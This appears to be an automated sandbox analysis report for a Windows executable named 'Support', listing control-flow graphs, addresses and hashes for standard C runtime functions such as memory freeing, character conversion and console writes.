                                                                                                                            • Part of subcall function 00614869: GetLastError.KERNEL32(?,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?,?), ref: 00614891
                                                                                                                          • _free.LIBCMT ref: 00616562
                                                                                                                          • _free.LIBCMT ref: 00616577
                                                                                                                          • _free.LIBCMT ref: 00616582
                                                                                                                          • _free.LIBCMT ref: 006165A4
                                                                                                                          • _free.LIBCMT ref: 006165B7
                                                                                                                          • _free.LIBCMT ref: 006165C5
                                                                                                                          • _free.LIBCMT ref: 006165D0
                                                                                                                          • _free.LIBCMT ref: 00616608
                                                                                                                          • _free.LIBCMT ref: 0061660F
                                                                                                                          • _free.LIBCMT ref: 0061662C
                                                                                                                          • _free.LIBCMT ref: 00616644
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 161543041-0
                                                                                                                          • Opcode ID: 34d8b5552da35e95e413ad34a85956fa6617eca71f86e21ed41f6858006daeb9
                                                                                                                          • Instruction ID: 26e1624284094fec2cc406aa0dfaf24140da53a9a45ce8bd6e6ac418a343601e
                                                                                                                          • Opcode Fuzzy Hash: 34d8b5552da35e95e413ad34a85956fa6617eca71f86e21ed41f6858006daeb9
                                                                                                                          • Instruction Fuzzy Hash: 14314B756106409FEBA0AA7AE805BDA77EBAF40350F18852EF449D72A1DE30EDC0CB54

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 138 614330-614341 139 614343-61434c call 614869 138->139 140 61434d-6143d8 call 614869 * 9 call 6141f6 call 614246 138->140 139->140
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 00614344
                                                                                                                            • Part of subcall function 00614869: HeapFree.KERNEL32(00000000,00000000,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?), ref: 0061487F
                                                                                                                            • Part of subcall function 00614869: GetLastError.KERNEL32(?,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?,?), ref: 00614891
                                                                                                                          • _free.LIBCMT ref: 00614350
                                                                                                                          • _free.LIBCMT ref: 0061435B
                                                                                                                          • _free.LIBCMT ref: 00614366
                                                                                                                          • _free.LIBCMT ref: 00614371
                                                                                                                          • _free.LIBCMT ref: 0061437C
                                                                                                                          • _free.LIBCMT ref: 00614387
                                                                                                                          • _free.LIBCMT ref: 00614392
                                                                                                                          • _free.LIBCMT ref: 0061439D
                                                                                                                          • _free.LIBCMT ref: 006143AB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 72720cdbd3ae937673244056613fb536468ac2bf1e85d5a539682db0f1dbbf22
                                                                                                                          • Instruction ID: 6034545b89010c02cf611f56dfb23a6702a71601cfbcdd16220a735f4ac564bc
                                                                                                                          • Opcode Fuzzy Hash: 72720cdbd3ae937673244056613fb536468ac2bf1e85d5a539682db0f1dbbf22
                                                                                                                          • Instruction Fuzzy Hash: 77118976610188FFCBC1EF96D842CD93B66EF44750F5941AAB9084F262DA31DE909B84

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 165 617ab4-617acd 166 617ae3-617ae8 165->166 167 617acf-617adf call 6182cc 165->167 168 617af5-617b19 MultiByteToWideChar 166->168 169 617aea-617af2 166->169 167->166 177 617ae1 167->177 171 617cac-617cbf call 61123a 168->171 172 617b1f-617b2b 168->172 169->168 174 617b2d-617b3e 172->174 175 617b7f 172->175 178 617b40-617b4f call 61ac20 174->178 179 617b5d-617b63 174->179 181 617b81-617b83 175->181 177->166 182 617ca1 178->182 192 617b55-617b5b 178->192 185 617b64 call 6162ff 179->185 181->182 183 617b89-617b9c MultiByteToWideChar 181->183 187 617ca3-617caa call 61646a 182->187 183->182 186 617ba2-617bbd call 615a15 183->186 189 617b69-617b6e 185->189 186->182 197 617bc3-617bca 186->197 187->171 189->182 193 617b74 189->193 196 617b7a-617b7d 192->196 193->196 196->181 198 617c04-617c10 197->198 199 617bcc-617bd1 197->199 201 617c12-617c23 198->201 202 617c5c 198->202 199->187 200 617bd7-617bd9 199->200 200->182 203 617bdf-617bf9 call 615a15 200->203 205 617c25-617c34 call 61ac20 201->205 206 617c3e-617c44 201->206 204 617c5e-617c60 202->204 203->187 220 617bff 203->220 209 617c62-617c7b call 615a15 204->209 210 617c9a-617ca0 call 61646a 204->210 205->210 218 617c36-617c3c 205->218 207 617c45 call 6162ff 206->207 212 617c4a-617c4f 207->212 209->210 223 617c7d-617c84 209->223 210->182 212->210 219 617c51 212->219 222 617c57-617c5a 218->222 219->222 220->182 222->204 224 617cc0-617cc6 223->224 225 617c86-617c87 223->225 226 617c88-617c98 WideCharToMultiByte 224->226 225->226 226->210 227 617cc8-617ccf call 61646a 226->227 227->187
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,006154C8,00000000,?,?,?,00617D05,?,?,00000100), ref: 00617B0E
                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00617B46
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00617D05,?,?,00000100,5EFC4D8B,?,?), ref: 00617B94
                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00617C2B
                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00617C8E
                                                                                                                          • __freea.LIBCMT ref: 00617C9B
                                                                                                                            • Part of subcall function 006162FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00617E5B,?,00000000,?,0061686F,?,00000004,00000000,?,?,?,00613BCD), ref: 00616331
                                                                                                                          • __freea.LIBCMT ref: 00617CA4
                                                                                                                          • __freea.LIBCMT ref: 00617CC9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2597970681-0
                                                                                                                          • Opcode ID: d4826a40b9447f4deb9c1f29abb5b8f231b9a67b73716971c68493732b01a3f5
                                                                                                                          • Instruction ID: 7169981d6050acab567986e733a5fd3b952b9eacf4f281526f2507d6d01f5222
                                                                                                                          • Opcode Fuzzy Hash: d4826a40b9447f4deb9c1f29abb5b8f231b9a67b73716971c68493732b01a3f5
                                                                                                                          • Instruction Fuzzy Hash: 8651AC72614216AFEB258E64CC81EEB77BBEB84750B1D8629FC04D6250EB74DCC096A0

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 230 618417-618474 GetConsoleCP 231 6185b7-6185c9 call 61123a 230->231 232 61847a-618496 230->232 233 6184b1-6184c2 call 616052 232->233 234 618498-6184af 232->234 241 6184c4-6184c7 233->241 242 6184e8-6184ea 233->242 236 6184eb-6184fa call 6172b7 234->236 236->231 246 618500-618520 WideCharToMultiByte 236->246 244 6184cd-6184df call 6172b7 241->244 245 61858e-6185ad 241->245 242->236 244->231 253 6184e5-6184e6 244->253 245->231 246->231 247 618526-61853c WriteFile 246->247 249 6185af-6185b5 GetLastError 247->249 250 61853e-61854f 247->250 249->231 250->231 252 618551-618555 250->252 254 618583-618586 252->254 255 618557-618575 WriteFile 252->255 253->246 254->232 257 61858c 254->257 255->249 256 618577-61857b 255->256 256->231 258 61857d-618580 256->258 257->231 258->254
                                                                                                                          APIs
                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00618B8C,?,00000000,?,00000000,00000000), ref: 00618459
                                                                                                                          • __fassign.LIBCMT ref: 006184D4
                                                                                                                          • __fassign.LIBCMT ref: 006184EF
                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00618515
                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,00618B8C,00000000,?,?,?,?,?,?,?,?,?,00618B8C,?), ref: 00618534
                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,00618B8C,00000000,?,?,?,?,?,?,?,?,?,00618B8C,?), ref: 0061856D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1324828854-0
                                                                                                                          • Opcode ID: 3819779335fb5b088562d352b13849488a7e469b308c5a8c90366e91db45bdfb
                                                                                                                          • Instruction ID: 8c30fc00d01b1b9023dfd186b1d719bf7e83b288f0af44aba2a58b7305cbb97e
                                                                                                                          • Opcode Fuzzy Hash: 3819779335fb5b088562d352b13849488a7e469b308c5a8c90366e91db45bdfb
                                                                                                                          • Instruction Fuzzy Hash: B65174719002499FDB10CFA8D885AEEBBF7EF19300F18815AE555E7291DB309981CB60

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 259 611e00-611e51 call 61ac80 call 611dc0 call 612377 266 611e53-611e65 259->266 267 611ead-611eb0 259->267 268 611ed0-611ed9 266->268 270 611e67-611e7e 266->270 267->268 269 611eb2-611ebf call 612360 267->269 274 611ec4-611ecd call 611dc0 269->274 272 611e80-611e8e call 612300 270->272 273 611e94 270->273 281 611e90 272->281 282 611ea4-611eab 272->282 276 611e97-611e9c 273->276 274->268 276->270 279 611e9e-611ea0 276->279 279->268 283 611ea2 279->283 284 611e92 281->284 285 611eda-611ee3 281->285 282->274 283->274 284->276 286 611ee5-611eec 285->286 287 611f1d-611f2d call 612340 285->287 286->287 289 611eee-611efd call 61aac0 286->289 292 611f41-611f5d call 611dc0 call 612320 287->292 293 611f2f-611f3e call 612360 287->293 297 611f1a 289->297 298 611eff-611f17 289->298 293->292 297->287 298->297
                                                                                                                          APIs
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00611E37
                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00611E3F
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00611EC8
                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00611EF3
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00611F48
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                          • String ID: csm
                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                          • Opcode ID: be9f96654a582a9fdbf8a98fad790d4675307b89ba8ce7413c5e2c6158d25e5a
                                                                                                                          • Instruction ID: 99391d09fe15717dbb42e256685e2fb29089bff365b20c2aeed5b25befad6876
                                                                                                                          • Opcode Fuzzy Hash: be9f96654a582a9fdbf8a98fad790d4675307b89ba8ce7413c5e2c6158d25e5a
                                                                                                                          • Instruction Fuzzy Hash: 1F41C234A00209ABCF10DF68C881ADEBBB6BF46364F1C8059ED149F392D7319A91CB90

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 305 61621b-616226 306 6162fc-6162fe 305->306 307 61622c-6162f9 call 6161df * 5 call 614869 * 3 call 6161df * 5 call 614869 * 4 305->307 307->306
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 006161DF: _free.LIBCMT ref: 00616208
                                                                                                                          • _free.LIBCMT ref: 00616269
                                                                                                                            • Part of subcall function 00614869: HeapFree.KERNEL32(00000000,00000000,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?), ref: 0061487F
                                                                                                                            • Part of subcall function 00614869: GetLastError.KERNEL32(?,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?,?), ref: 00614891
                                                                                                                          • _free.LIBCMT ref: 00616274
                                                                                                                          • _free.LIBCMT ref: 0061627F
                                                                                                                          • _free.LIBCMT ref: 006162D3
                                                                                                                          • _free.LIBCMT ref: 006162DE
                                                                                                                          • _free.LIBCMT ref: 006162E9
                                                                                                                          • _free.LIBCMT ref: 006162F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                          • Instruction ID: 497dcc0e7e64bde8588ba77267729101ed9b1c5efc64b6c190c04d24ed1b1a03
                                                                                                                          • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                          • Instruction Fuzzy Hash: BD118135540B54BAD5E0B7B8CC0BFCB779E5F40700F48482CB69AA7093DA75FA844654

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 342 6123d1-6123d8 343 6123da-6123dc 342->343 344 6123dd-6123f8 GetLastError call 6126a4 342->344 347 612411-612413 344->347 348 6123fa-6123fc 344->348 349 612457-612462 SetLastError 347->349 348->349 350 6123fe-61240f call 6126df 348->350 350->347 353 612415-612425 call 613f67 350->353 356 612427-612437 call 6126df 353->356 357 612439-612449 call 6126df 353->357 356->357 362 61244b-61244d 356->362 363 61244f-612456 call 613ec5 357->363 362->363 363->349
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,006123C8,0061209F,00611AFC), ref: 006123DF
                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006123ED
                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00612406
                                                                                                                          • SetLastError.KERNEL32(00000000,006123C8,0061209F,00611AFC), ref: 00612458
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3852720340-0
                                                                                                                          • Opcode ID: eb4f585ccb1c61e38f6133db35f77873bf03ea23f4dbc6f2c7f8e62f58d5046a
                                                                                                                          • Instruction ID: 3d102986582c60d076a04d70285705d59fb2fe5e6a4446839851cd60ac85c437
                                                                                                                          • Opcode Fuzzy Hash: eb4f585ccb1c61e38f6133db35f77873bf03ea23f4dbc6f2c7f8e62f58d5046a
                                                                                                                          • Instruction Fuzzy Hash: 4401283210C76F5FA7242774BCA59E72797DB123B4738123EF520442E4EF110CE25184

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 366 614424-614438 GetLastError 367 614446-61444b 366->367 368 61443a-614444 call 615904 366->368 370 61444d call 61480c 367->370 368->367 373 61448f-61449a SetLastError 368->373 372 614452-614458 370->372 374 614463-614471 call 61595a 372->374 375 61445a 372->375 380 614473-614474 374->380 381 614476-61448d call 614296 call 614869 374->381 376 61445b-614461 call 614869 375->376 384 61449b-6144a7 SetLastError call 613f24 376->384 380->376 381->373 381->384
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(00000008,?,00616D69,?,?,?,006204C8,0000002C,00613F34,00000016,0061209F,00611AFC), ref: 00614428
                                                                                                                          • _free.LIBCMT ref: 0061445B
                                                                                                                          • _free.LIBCMT ref: 00614483
                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00614490
                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 0061449C
                                                                                                                          • _abort.LIBCMT ref: 006144A2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3160817290-0
                                                                                                                          • Opcode ID: 64a8e24d9abeedbf35098a704c42e5e3e09544e9911b7312961f6f3effef7527
                                                                                                                          • Instruction ID: 63a0e6ea0410d687fad4d5364dba3cc9cecb49daaf60883779ac336bc4d6f2ca
                                                                                                                          • Opcode Fuzzy Hash: 64a8e24d9abeedbf35098a704c42e5e3e09544e9911b7312961f6f3effef7527
                                                                                                                          • Instruction Fuzzy Hash: D5F02831504AC0A6C3A2B734AC19FEB22ABDBC57B2B2C8419F52DD7291EF61C9C25125

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 390 6136fc-613724 GetModuleHandleExW 391 613726-613739 GetProcAddress 390->391 392 613749-61374d 390->392 393 613748 391->393 394 61373b-613746 391->394 395 613758-613765 call 61123a 392->395 396 61374f-613752 FreeLibrary 392->396 393->392 394->393 396->395
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,006136AD,?,?,0061364D,?,006202E0,0000000C,006137A4,?,00000002), ref: 0061371C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0061372F
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,006136AD,?,?,0061364D,?,006202E0,0000000C,006137A4,?,00000002,00000000), ref: 00613752
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                          • Opcode ID: 6df01e0b462424031124aad5baa00e0e9d4aa3974682e4e656678a4f12b4d986
                                                                                                                          • Instruction ID: 96dc88799609f01b0d0027d8b29f4642ee0d96751bdf5045275c503077db48c5
                                                                                                                          • Opcode Fuzzy Hash: 6df01e0b462424031124aad5baa00e0e9d4aa3974682e4e656678a4f12b4d986
                                                                                                                          • Instruction Fuzzy Hash: 3AF06D70900218BBCB159FA0DC49BEE7FF6DF08752F095055F90596250DB305E85CB54

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 400 61634d-616372 call 613f72 403 616374-61637c 400->403 404 61637f-6163a5 MultiByteToWideChar 400->404 403->404 405 616444-616448 404->405 406 6163ab-6163b7 404->406 409 616454-616469 call 61123a 405->409 410 61644a-61644d 405->410 407 616403 406->407 408 6163b9-6163ca 406->408 411 616405-616407 407->411 412 6163e5-6163eb 408->412 413 6163cc-6163db call 61ac20 408->413 410->409 416 616409-61642b call 6120b0 MultiByteToWideChar 411->416 417 61643d-616443 call 61646a 411->417 419 6163ec call 6162ff 412->419 413->417 427 6163dd-6163e3 413->427 416->417 429 61642d-61643b GetStringTypeW 416->429 417->405 420 6163f1-6163f6 419->420 420->417 424 6163f8 420->424 428 6163fe-616401 424->428 427->428 428->411 429->417
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,006154C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 0061639A
                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006163D2
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00616423
                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00616435
                                                                                                                          • __freea.LIBCMT ref: 0061643E
                                                                                                                            • Part of subcall function 006162FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00617E5B,?,00000000,?,0061686F,?,00000004,00000000,?,?,?,00613BCD), ref: 00616331
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1857427562-0
                                                                                                                          • Opcode ID: 6cd33e9678ad3d00e281517fc1d7df8b170e7ebdbdcdf285ea98e0a1d946e00e
                                                                                                                          • Instruction ID: 359d98c5e111644d6597d28cf927863fdff3f12c94f26655f2a841bde76dd1dd
                                                                                                                          • Opcode Fuzzy Hash: 6cd33e9678ad3d00e281517fc1d7df8b170e7ebdbdcdf285ea98e0a1d946e00e
                                                                                                                          • Instruction Fuzzy Hash: 6F31CF76A0021AABDF25DF65DC45DEE7BA6EF04710F088169FC14DA250E735CD91CBA0

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 430 61561e-615633 GetEnvironmentStringsW 431 615635-615655 call 6155e7 WideCharToMultiByte 430->431 432 61568b 430->432 431->432 438 615657 431->438 433 61568d-61568f 432->433 435 615691-615692 FreeEnvironmentStringsW 433->435 436 615698-6156a0 433->436 435->436 439 615658 call 6162ff 438->439 440 61565d-615662 439->440 441 615680 440->441 442 615664-615678 WideCharToMultiByte 440->442 443 615682-615689 call 614869 441->443 442->441 444 61567a-61567e 442->444 443->433 444->443
                                                                                                                          APIs
                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00615627
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0061564A
                                                                                                                            • Part of subcall function 006162FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00617E5B,?,00000000,?,0061686F,?,00000004,00000000,?,?,?,00613BCD), ref: 00616331
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00615670
                                                                                                                          • _free.LIBCMT ref: 00615683
                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00615692
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
